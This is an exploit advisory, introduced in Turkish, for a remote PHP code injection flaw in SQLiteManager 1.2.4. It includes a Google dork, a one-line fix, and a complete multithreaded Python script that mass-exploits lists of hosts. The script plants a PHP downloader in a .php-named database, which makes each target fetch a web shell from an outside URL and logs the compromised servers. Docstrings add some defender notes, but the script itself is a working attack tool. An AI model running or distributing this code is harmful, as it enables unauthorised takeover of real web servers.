SQLiteManager 1.2.4 Remote PHP Code Injection Vulnerability

SQLiteManager 1.2.4 sürümünde Remote PHP Code Injection açığı bulunmuştur. Açık sayesinde PHP Shell upload edilebilmekte, servere full erişim hakkı elde edilebilmektedir. Açığın oluşum yeri, açık hakkındaki açıklamalar ve exploit şu şekilde:

Description:
===============================================================
Exploit Title: SQLiteManager 0Day Remote PHP Code Injection Vulnerability
Google Dork: intitle:SQLiteManager inurl:sqlite/
Date: 23/01/2013
Exploit Author: RealGame
Vendor Homepage: http://www.Relagame.co.il
Software Link: http://sourceforge.net/projects/sqlitemanager/
Version: <=1.2.4
Tested on: Windows XP, Debian 2.6.32-46
CVE: N/A
===============================================================
Vulnerable Softwares:
 
Name: SQLiteManager
Official Site: http://www.sqlitemanager.org/
 
Name: Ampps
Official Site: http://www.ampps.com/
 
Name: VertrigoServ
Official Site: http://vertrigo.sourceforge.net/
===============================================================
About Software:
Official Site: http://www.sqlitemanager.org/
SQLiteManager is a database manager for SQLite databases. You can manage
any SQLite database created on any platform with SQLiteManager.
===============================================================
Easy Way To Fix (strips every '.' from the user-supplied dbpath, so the created database file can no longer be given a .php extension):
Find: SQLiteStripSlashes($_POST['dbpath'])
Replace: str_replace('.', '', SQLiteStripSlashes($_POST['dbpath']))
On File: ./include/add_database.php
===============================================================
 
import re
import urllib2
from urllib import urlencode
from sys import argv, exit
from time import sleep
from threading import Thread, activeCount
from socket import setdefaulttimeout
 
def strip_tags(value):
    """Remove anything that looks like an HTML/XML tag from *value*.

    getDbId uses this to compare the text content of a scraped ``<td>``
    cell with a database name. ``'<[^>]*>'`` matches exactly the same spans
    as the original lazy pattern ``'<[^>]*?>'``: a ``<`` followed by
    non-``>`` characters up to the first ``>``; an unterminated ``<`` is
    left untouched. This is a scraping helper, not an HTML sanitizer, and
    must not be relied on to neutralise markup in untrusted input.
    """
    tag_pattern = re.compile(r'<[^>]*>')
    return tag_pattern.sub('', value)
 
def writeLog(log, msg):
    """Append *msg* plus CRLF to the open file *log*, flush it, and echo *msg*.

    *log* is one of the shared log handles opened in main(); the flush after
    every line makes the on-disk file reflect progress immediately instead
    of waiting for the buffer to fill.
    """
    line = '%s\r\n' % msg
    log.write(line)
    log.flush()
    print(msg)
 
def getTextFile(txt):
    """Return the lines of the open text file *txt* as a list of strings.

    Carriage returns are removed first so CRLF and LF files give the same
    result, then the text is split on ``'\\n'``. Unlike ``str.splitlines``
    this keeps blank lines and yields a trailing empty string when the file
    ends with a newline; main() passes every element on unfiltered. The
    handle is not closed here.
    """
    raw = txt.read()
    unix_text = raw.replace('\r', '')
    return unix_text.split('\n')
 
def getUrl(ip):
    """Probe *ip* (``host`` or ``host:port``) for a SQLiteManager front page.

    Tries the three candidate web roots in order and returns the first URL
    whose response body contains the string "SQLiteManager", or None when
    nothing responds or matches. Seen from the target, this is up to three
    plain GETs with urllib2's default User-Agent (no headers are set here)
    and a 120 s timeout each — the footprint an access-log or WAF rule can
    key on.
    """
    urlOptions = ['/sqlite/','/sqlitemanager/','/']
    for option in urlOptions:
        url = 'http://' + ip + option
        try:
            htmlRes = urllib2.urlopen(url, None, 120).read()
            if "SQLiteManager" in htmlRes:
                return url
        #Not Responding Error
        except Exception:
            #Any failure (timeout, refused connection, HTTP error) silently
            #moves on to the next candidate path; nothing is logged for it.
            continue
    return None
 
def getDbId(url, myDbName):
    """Return the ``dbsel`` id of the database named *myDbName*, or None.

    *url* is the SQLiteManager ``left.php`` listing (see pwnIt). Every
    ``<td class="name_db">`` cell is compared, after tag stripping, with
    *myDbName*; the id is taken from the ``?dbsel=`` query parameter of the
    link inside the matching cell. This depends on the exact markup of the
    tested SQLiteManager versions — any change to the table layout makes it
    return None.
    """
    #Find Components
    htmlRes = urllib2.urlopen(url, None, 120).read()
    if htmlRes:
        #If you found it take all the rows
        td = re.findall('<td class="name_db">(.*?)</td>', htmlRes, re.DOTALL)
        #Compare the tag-stripped text of each cell with the wanted name
        for element in td: 
            if strip_tags(element) == myDbName:
                #Return Id
                #"".join() turns the (normally single-element) findall list
                #into a string; several matches would be concatenated.
                return "".join(re.findall('\?dbsel=(.*?)"', element, re.DOTALL))
    return None
 
def getOs(information):
    """Classify the target's OS from *information*.

    pwnIt passes ``res.info()``, i.e. the HTTP response headers of the
    target. Anything whose stringified, lower-cased form contains
    ``"win32"`` is reported as Win32; everything else is lumped together as
    "Linux / MacOSX". It is a coarse banner fingerprint, not reliable OS
    detection.
    """
    fingerprint = str(information).lower()
    return "Win32" if "win32" in fingerprint else "Linux / MacOSX"
 
def pwnIt(ip, activity, success):
    """Run the full exploit chain against one target and log the outcome.

    Runs in its own thread (see main()). *activity* and *success* are the
    shared, already-open log handles. The chain is:

    1. locate the SQLiteManager root (getUrl);
    2. POST ``action=saveDb`` to ``main.php`` with ``dbpath`` set to a
       ``.php`` filename — apparently the user-supplied path becomes the
       on-disk name of the new SQLite file, so the database lands inside
       the web root with a PHP extension (the vendor-side fix quoted in the
       advisory header strips ``.`` from ``dbpath`` for exactly this
       reason);
    3. look up the new database's id on ``left.php`` (getDbId);
    4. run SQL that stores a short PHP downloader as row data, so that
       source ends up inside the ``.php`` database file;
    5. GET that file so the server executes it — the stored code opens
       ``shellUrl`` with ``fopen`` and copies it to ``shellName``;
    6. delete the database entry and log success.

    Defender notes (what this leaves behind): from one client, in quick
    succession, a ``saveDb`` POST to ``main.php``, a ``left.php`` GET, a
    POST to ``main.php?dbsel=<id>&table=temptab``, a GET of ``sql.php`` and
    a ``dbsel=<id>...&action=del`` GET; an outbound HTTP fetch from the web
    server itself to ``shellUrl`` (step 5 needs PHP to permit URL
    ``fopen`` — ``allow_url_fopen=Off`` breaks this payload, though not the
    underlying flaw); and the new files ``sql.php`` and ``right.php`` in
    the SQLiteManager directory. Whether ``action=del`` also removes the
    ``sql.php`` file from disk is not visible here — check the application
    code before treating a clean ``left.php`` listing as proof of no
    compromise.
    """
    writeLog(activity, 'Now: %s' % ip)
    url = getUrl(ip)
    if not url:
        writeLog(activity, 'Error: %s sqlite not found' % ip)
        return

    myDbName  = "sqlphp"
    myDbFile  = "sql.php"
    shellName = "right.php"
    if len(argv) == 3:
        shellUrl  = argv[2]
    else:
        #Default payload is fetched by the *target* from this third-party URL
        shellUrl  = "http://garr.dl.sourceforge.net/project/c37-shell/C37-1.3.php"
    #Create Database
    #urlencode() sends the literal string 'None' for the None-valued fields
    params = {'dbname'      : myDbName,
              'dbVersion'   : '2',
              'dbRealpath'  : None,
              'dbpath'      : myDbFile,
              'action'      : 'saveDb'}
    res = urllib2.urlopen(url + "main.php", urlencode(params), 120)
    #Get Operation System
    opSystem = getOs(res.info())
    #Get Database ID
    dbId = getDbId(url + "left.php", myDbName)
    #If Database Created
    if dbId:
        #Create Table + Shell Creator
        #The inserted row is PHP source; because the database file itself is
        #named sql.php, requesting it (below) runs this code server-side.
        params = {'DisplayQuery'    : 'CREATE TABLE temptab ( codetab text );\n' + \
                  'INSERT INTO temptab VALUES (\'<?php $destination=fopen("%s","w");$source=fopen("%s","r");while ($a=fread($source,1024)) fwrite($destination,$a);fclose($source);fclose($destination);?>\');\n' %(shellName, shellUrl),
                  'sqlFile'         : None,
                  'action'          : 'sql',
                  'sqltype'         : '1'}
        urllib2.urlopen(url + "main.php?dbsel=%s&table=temptab" %dbId, urlencode(params), 120)
        #Create Shell
        #GET of the .php-named database file triggers the stored downloader
        urllib2.urlopen(url + myDbFile, None, 120)
        #Remove Database
        #Deletes the left.php entry; whether the file is unlinked is not checked
        urllib2.urlopen(url + "main.php?dbsel=%s&table=&view=&trigger=&function=&action=del" %dbId, None, 120)
        #Update Log
        writeLog(success, 'Succces: %s - OS: %s' % (url + shellName, opSystem))
        return

    writeLog(activity, 'Fail: %s' % ip)
 
def main():
    """Entry point: read targets from argv[1] and run pwnIt against each.

    With no argument, prints usage (argv[0] reduced to its basename) and
    exits. Otherwise opens the two log files in append mode, sets a 120 s
    default socket timeout, and starts one thread per input line,
    throttling so that at most about nine workers run at once (the main
    thread is counted by activeCount()). Started threads are never joined;
    being non-daemon threads they keep the process alive until the last one
    finishes. The log handles are shared by all workers and never
    explicitly closed.
    """
    if len(argv) < 2:
        filename = argv[0].replace('\\', '/').split('/')
        filename = filename[-1]

        print \
        'SQLiteManager Auto Pwn\n' + \
        'Made By TzAnAnY\n\n' + \
        'Execute Example: ' + filename + ' ips.txt\n' + \
        'Another Example: ' + filename + ' ips.txt FileURL\n' + \
        'ips.txt -> File with ip:port(Filtered)\n' + \
        'FileURL -> The Shell File URL\n' + \
        'All Activity logs on Activity.log\n' + \
        'All Success logs on Success.log'
        exit()

    #Blank lines are not filtered; each element becomes a target string
    ips = getTextFile(open(argv[1], 'r'))
    success = open('Success.log', 'a+b')
    activity = open('Activity.log', 'a+b')
    #Set Socket Time Out
    setdefaulttimeout(120)

    for ip in ips:
        Thread(target=pwnIt, args=(ip, activity, success)).start()
        #Spin until fewer than 10 threads (incl. this one) are alive
        while activeCount() >= 10:
            sleep(1)
 
if __name__ == '__main__':
    #Only run when executed as a script, not when imported
    main()
 
# 93238C8D66448B3F   1337day.com [2013-01-26]   1F04097D9EC01067 #

